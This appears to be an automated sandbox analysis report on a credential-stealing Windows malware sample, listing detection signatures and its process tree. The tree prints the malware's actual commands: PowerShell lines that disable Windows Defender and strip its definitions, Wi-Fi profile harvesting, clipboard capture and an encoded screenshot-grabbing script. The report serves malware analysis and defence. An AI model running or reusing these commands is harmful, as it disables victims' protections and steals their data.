Edit tour

Windows Analysis Report
8Ck8T5qRcC.exe

Overview

General Information

Sample name:	8Ck8T5qRcC.exe renamed because original name is a hash value
Original sample name:	4FEC8FAF6590F62034AD44A54175B9E9.exe
Analysis ID:	1485736
MD5:	4fec8faf6590f62034ad44a54175b9e9
SHA1:	d7f0d639d943aeee3f98442eec744ca0e78a07d1
SHA256:	68231c9b195a3987bc26bb9af2543f49a04c1343bbb17982bc6302a21138e33a
Tags:	BlankGrabberexe
Infos:

Detection

Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Sigma detected: Stop multiple services

Yara detected Blank Grabber

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected Telegram RAT

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files with benign system names

Encrypted powershell cmdline option found

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Suspicious Startup Folder Persistence

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Binaries Write Suspicious Extensions

Stops critical windows services

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes or reads registry keys via WMI

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

8Ck8T5qRcC.exe (PID: 6448 cmdline: "C:\Users\user\Desktop\8Ck8T5qRcC.exe" MD5: 4FEC8FAF6590F62034AD44A54175B9E9)

hacn.exe (PID: 6616 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)

hacn.exe (PID: 6804 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)

cmd.exe (PID: 2004 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

s.exe (PID: 7008 cmdline: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym MD5: E5DB23B3AAF4DDDD2BAF96FB7BBA9616)

svchost.exe (PID: 3808 cmdline: "C:\ProgramData\svchost.exe" MD5: 45C59202DCE8ED255B4DBD8BA74C630F)

wscript.exe (PID: 7080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ChainComServermonitor.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

csc.exe (PID: 7084 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 1148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7612 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6DA.tmp" "c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

setup.exe (PID: 6956 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)

based.exe (PID: 6664 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 838A5BD59DE32F425938CBA6C119CBEE)

based.exe (PID: 6828 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 838A5BD59DE32F425938CBA6C119CBEE)

cmd.exe (PID: 6972 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6468 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6976 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6948 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3236 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6584 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7344 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7616 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7360 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7724 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8176 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7900 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3084 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7908 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7356 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 4520 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7940 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7404 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7972 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 7388 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 8060 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8088 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 5932 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 8076 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 7008 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8152 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 7204 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 1344 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC3.tmp" "c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

